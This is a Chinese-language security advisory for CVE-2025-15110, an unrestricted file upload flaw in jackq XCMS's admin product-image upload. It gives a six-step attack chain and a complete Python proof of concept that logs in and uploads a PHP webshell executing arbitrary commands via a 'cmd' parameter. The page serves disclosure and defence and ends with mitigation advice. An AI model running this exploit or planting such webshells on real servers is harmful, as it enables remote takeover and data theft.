CVE-2025-15110 jackq XCMS 后台文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-15110

漏洞类型

无限制文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

jackq XCMS

漏洞概述

CVE-2025-15110是影响jackq XCMS系统的一个中危安全漏洞，CVSS评分4.7。该漏洞存在于XCMS的后台管理组件中，具体位于Admin/Home/Controller/ProductImageController.class.php文件的Upload函数。由于该函数对用户上传的文件缺乏有效的安全验证和过滤机制，攻击者可以通过后台管理接口上传任意类型的恶意文件，包括可执行的WebShell脚本。漏洞需要攻击者具备后台高权限认证，但由于系统未对上传文件类型和内容进行严格限制，成功利用后可导致服务器被完全控制。XCMS是一个采用滚动发布模式的内容管理系统，该漏洞影响至提交版本3fab5342cc509945a7ce1b8ec39d19f701b89261。项目方已通过Issue报告得知该问题，但截至披露时仍未做出响应或发布修复版本。

技术细节

该漏洞属于典型的无限制文件上传（Unrestricted File Upload）漏洞。漏洞点位于ProductImageController.class.php中的Upload方法，该方法在处理产品图片上传请求时，直接接收用户提交的File参数而未进行充分的文件类型验证、白名单检查或内容安全检测。攻击者利用此漏洞可以绕过客户端和服务器端的基本安全检查，上传.php、.jsp、.asp等可执行脚本文件到服务器Web目录。成功上传恶意文件后，攻击者可通过HTTP请求直接访问并执行这些WebShell，从而获得服务器的命令执行能力。由于该漏洞位于后台管理功能，虽然需要认证才能访问，但一旦攻击者获取后台管理员凭据，即可利用此漏洞实现服务器远程代码执行。建议在文件上传功能中实现以下安全措施：严格的文件类型白名单验证、MIME类型检查、文件内容魔术字节校验、上传目录与Web根目录隔离、以及文件名随机化处理。

攻击链分析

STEP 1

步骤1

获取后台管理员账号凭据：通过暴力破解、钓鱼、社会工程学或利用其他漏洞获取XCMS后台登录凭证

STEP 2

步骤2

登录后台管理系统：使用获取的凭据登录XCMS后台管理界面，进入产品图片管理模块

STEP 3

步骤3

构造恶意文件：准备包含恶意代码的PHP/JSP/ASP webshell文件，绕过基本文件类型检测

STEP 4

步骤4

上传恶意文件：通过ProductImageController的Upload函数上传webshell，由于缺乏安全验证，上传成功

STEP 5

步骤5

执行恶意代码：通过HTTP请求访问上传的webshell文件，传入系统命令实现远程代码执行

STEP 6

步骤6

持久化控制：创建后门账户、上传更多工具、窃取数据或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15110 PoC - jackq XCMS Unrestricted File Upload
# Authentication required (High Privilege)

def upload_shell(target_url, username, password):
    """
    Upload malicious PHP shell to vulnerable XCMS instance
    """
    login_url = f"{target_url}/index.php?m=Admin&c=Login&a=login"
    upload_url = f"{target_url}/index.php?m=Admin&c=ProductImage&a=Upload"
    
    # Login to get session
    session = requests.Session()
    login_data = {
        'username': username,
        'password': password
    }
    resp = session.post(login_url, data=login_data)
    
    # PHP webshell content
    php_shell = '''<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
}
?>'''
    
    # Upload malicious file
    files = {
        'File': ('shell.php', php_shell, 'application/x-php')
    }
    
    try:
        response = session.post(upload_url, files=files)
        if response.status_code == 200:
            print(f"[+] Shell uploaded successfully!")
            print(f"[+] Access shell at: {target_url}/uploads/shell.php?cmd=whoami")
        else:
            print(f"[-] Upload failed: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    upload_shell(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

jackq XCMS <= 3fab5342cc509945a7ce1b8ec39d19f701b89261

防御指南

临时缓解措施

由于该漏洞需要后台高权限才能利用，建议首先加强后台管理账户的安全：使用强密码策略、启用双因素认证、限制登录IP范围、启用登录失败锁定机制。同时在Web应用层配置WAF规则，检测并阻止异常的文件上传请求。对于必须使用的上传功能，暂时限制其访问权限，仅允许受信任的管理员使用，并密切监控上传目录的文件变化情况。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15110
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15110
3 Details https://www.cvedetails.com/cve/CVE-2025-15110/
4 VulDB https://vuldb.com/cve/CVE-2025-15110
5 Link https://gitee.com/jackq/XCMS/
6 Link https://gitee.com/jackq/XCMS/issues/IDC5C8
7 Link https://vuldb.com/?ctiid.338481
8 Link https://vuldb.com/?id.338481
9 Link https://vuldb.com/?submit.711702
10 Link https://gitee.com/jackq/XCMS/issues/IDC5C8